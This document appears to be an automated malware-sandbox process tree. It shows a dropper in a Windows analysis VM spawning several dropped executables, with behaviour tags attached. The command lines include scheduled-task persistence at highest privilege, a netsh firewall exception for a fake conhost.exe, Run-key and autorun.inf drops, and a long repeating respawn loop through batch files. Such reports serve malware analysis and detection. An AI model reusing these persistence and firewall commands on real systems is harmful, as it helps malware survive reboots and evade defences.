C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1384
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2556
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2288
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2716
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2808
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3124
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Security.exe"C:\Users\Admin\AppData\Local\Temp\Files\Security.exe"3⤵
- Executes dropped EXE
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\$77Security.exe"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2980 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:4768 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3140
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\client.exe"C:\Users\Admin\AppData\Local\Temp\Files\client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\Files\444.exe"C:\Users\Admin\AppData\Local\Temp\Files\444.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2480 -
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4716 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5012
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cli.exe"C:\Users\Admin\AppData\Local\Temp\Files\cli.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3172 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3580
-
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1412 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c0wBGCt6qNZu.bat" "5⤵PID:2960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3116
-
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:3692
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4688
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"6⤵
- Executes dropped EXE
PID:704 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:4072 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JL1UoujlVVh8.bat" "7⤵PID:4796
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3240
-
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3224
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5028
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2848 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NbAtU5luXqvl.bat" "9⤵PID:4012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:4896
-
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:1840
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵PID:3240
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:2636 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:3044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BBcQKUfTp1NP.bat" "11⤵PID:5092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:1768
-
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:2180
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1472
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"12⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3240 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f13⤵PID:3148
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:3520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gZJ6kL94NpFh.bat" "13⤵PID:4636
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:4992
-
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵PID:1012
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"14⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2216 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:1536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B1sCmfX7kSOO.bat" "15⤵PID:1880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:4708
-
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:2624
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵PID:1824
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"16⤵
- Executes dropped EXE
PID:1860 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:408 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵PID:3400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RczRhUkZ4cIP.bat" "17⤵PID:1056
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵PID:4988
-
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3052
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3984
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"18⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3968 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f19⤵PID:4548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:3580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9emGgeU4waqd.bat" "19⤵PID:4940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:3208
-
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:412
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- Runs ping.exe
PID:1968
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"20⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3700 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:1156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fPfbkU7wezBz.bat" "21⤵PID:1020
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵PID:1860
-
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3444
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3228
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"22⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3804 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:4672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vI3WbjpLEbKv.bat" "23⤵PID:248
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵PID:4216
-
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:1060
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- Runs ping.exe
PID:2584
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"24⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2112 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f25⤵PID:2572
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV126⤵PID:3924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l7dTiwuu5vYO.bat" "25⤵PID:2032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV126⤵PID:1492
-
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:3452
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4536
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"26⤵
- Executes dropped EXE
PID:772 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:1572 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV128⤵PID:4792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rtIP4TBV9Trf.bat" "27⤵PID:2896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV128⤵PID:4224
-
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:2632
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1064
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"28⤵
- Executes dropped EXE
PID:4048 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f29⤵PID:200
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wU6p0ecGlGDg.bat" "29⤵PID:788
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:2152
-
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:4852
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5012
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"30⤵
- Executes dropped EXE
PID:2872 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:1884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV132⤵PID:2260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BJl6Et0pMmcg.bat" "31⤵PID:756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV132⤵PID:588
-
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:3044
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵PID:920
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"32⤵
- Executes dropped EXE
PID:4720 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9aDDqLJMjWlE.bat" "33⤵PID:2624
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵PID:3780
-
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:2876
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:872
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"34⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1464 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f35⤵PID:1064
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV136⤵PID:1488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aElWQqetGAyr.bat" "35⤵PID:2232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV136⤵PID:3240
-
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:3056
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- Runs ping.exe
PID:4024
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"36⤵
- Executes dropped EXE
PID:4808 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f37⤵
- Scheduled Task/Job: Scheduled Task
PID:1536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nX5dcyJI6NmV.bat" "37⤵PID:588
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV138⤵PID:1584
-
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:3472
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- Runs ping.exe
PID:1052
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"38⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3384 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f39⤵
- Scheduled Task/Job: Scheduled Task
PID:1396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV140⤵PID:1020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSHbW19dpPKn.bat" "39⤵PID:2872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV140⤵PID:3200
-
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:956
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵PID:2932
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"40⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1880 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f41⤵PID:1052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV142⤵PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOTLuJivrMiR.bat" "41⤵PID:1600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV142⤵PID:2300
-
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:4216
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- Runs ping.exe
PID:2232
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"42⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:224 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f43⤵
- Scheduled Task/Job: Scheduled Task
PID:1840 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV144⤵PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fLgizBHy5F95.bat" "43⤵PID:328
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV144⤵PID:3112
-
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:2908
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- Runs ping.exe
PID:4768
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"44⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2160 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f45⤵
- Scheduled Task/Job: Scheduled Task
PID:1744 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵PID:1588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zRaqXqADNHPd.bat" "45⤵PID:3968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵PID:1620
-
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:3012
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2260
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"46⤵PID:3012
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f47⤵
- Scheduled Task/Job: Scheduled Task
PID:2876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV148⤵PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YlmumB0RYrd9.bat" "47⤵PID:796
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV148⤵PID:3084
-
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:4364
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:992
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"48⤵
- Drops file in System32 directory
PID:924 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f49⤵
- Scheduled Task/Job: Scheduled Task
PID:4828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mb0Vq0ojglPG.bat" "49⤵PID:3780
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV150⤵PID:4072
-
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:3616
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2100
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"50⤵PID:3176
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f51⤵PID:772
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV152⤵PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QvlWz47UUJ92.bat" "51⤵PID:3004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV152⤵PID:2920
-
-
C:\Windows\system32\chcp.comchcp 6500152⤵PID:952
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost52⤵PID:1484
-
-
C:\Windows\system32\sru\sru.exe"C:\Windows\system32\sru\sru.exe"52⤵PID:1972
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f53⤵
- Scheduled Task/Job: Scheduled Task
PID:2420 -
